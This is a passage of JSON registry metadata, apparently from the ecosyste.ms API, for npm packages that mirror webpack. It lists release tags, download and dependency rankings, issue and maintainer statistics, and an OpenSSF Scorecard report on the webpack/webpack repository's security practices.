g_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-31T03:21:40.289Z","dependent_packages_count":1,"downloads":18,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":59.88173098450381,"dependent_repos_count":10.295976646711454,"dependent_packages_count":20.907756255897063,"stargazers_count":0.07834503466984864,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":18.311314095843073},"purl":"pkg:npm/%40stereokai/webpack-1","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@stereokai/webpack-1","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@stereokai/webpack-1","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@stereokai/webpack-1/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T17:00:08.374Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@stereokai%2Fwebpack-1/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@stereokai%2Fwebpack-1/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@stereokai%2Fwebpack-1/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@stereokai%2Fwebpack-1/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@stereokai%2Fwebpack-1/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@stereokai%2Fwebpack-1/codemeta","maintainers":[{"uuid":"stereokai","login":"stereokai","name":null,"email":"tom@stereokai.com","url":null,"packages_count":3,"html_url":"https://www.npmjs.com/~stereokai","role":null,"created_at":"2022-11-11T00:54:22.621Z","updated_at":"2022-11-11T00:54:22.621Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/stereokai/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2044958,"name":"mwebpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":3,"first_release_published_at":"2018-08-27T09:36:30.663Z","latest_release_published_at":"2018-08-27T10:29:51.150Z","latest_release_number":"1.0.3","last_synced_at":"2026-09-03T00:24:50.668Z","created_at":"2022-04-09T20:03:13.298Z","updated_at":"2026-09-03T00:24:50.668Z","registry_url":"https://www.npmjs.com/package/mwebpack","install_command":"npm install mwebpack","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.0.3"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses 